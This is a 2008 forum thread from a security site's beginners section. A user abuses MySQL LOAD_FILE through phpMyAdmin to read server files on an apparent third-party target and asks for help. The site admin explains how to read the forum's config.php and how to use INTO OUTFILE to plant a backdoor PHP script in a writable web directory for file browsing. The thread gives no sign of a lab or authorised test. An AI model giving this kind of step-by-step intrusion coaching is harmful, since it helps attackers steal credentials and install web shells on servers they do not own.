|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 84
Members: 0
Total: 84
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
Posted: Thu Apr 10, 2008 7:07 pm |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
i foudn this only
SELECT LOAD_FILE('/etc/apache/httpd.conf');
and its the original one ! no modification on ....
wow so hard to find is site directory.
i get a error on phomyadmin
Warning: Variable passed to each() is not an array or object in /home/local/apache/htdocs/sites/s/site.com/phpmyadmin/libraries/display_tbl.lib.php on line 1385
i try
SELECT LOAD_FILE('/home/local/apache/htdocs/sites/s/site.com/');
nothing work i get
MySQL a répondu:
#13 - Can't get stat of '/home/local/apache/htdocs/site.com/s/site.com/' (Errcode: 2)
someone can help me please ! |
|
|
|
|
|
|
|
|
Posted: Thu Apr 10, 2008 8:15 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
So right now you know target's webroot: "/home/local/apache/htdocs/sites/s/site.com/", right?
I can see there 2 options:
1. You allready know files you want to download.
Let's say it's file http://site.com/forum/config.php
Then you can read it as
LOAD_FILE('/home/local/apache/htdocs/sites/s/site.com/forum/config.php')
2. You don't know files you want to download and you want first to browse them (directory listing).
It means that you have to use "INTO OUTFILE" for writing backdoor php script, which will then do all the dirty work for you, including directory listing. Problem is, that you have to save new file to target directory, which:
2.1 must be accessible from web
2.2 must be writable for MySql UID
For example "temp", "upload", "data", "cache" and similary named directories can be writable for MySql user. But you must try this out via trial/error |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|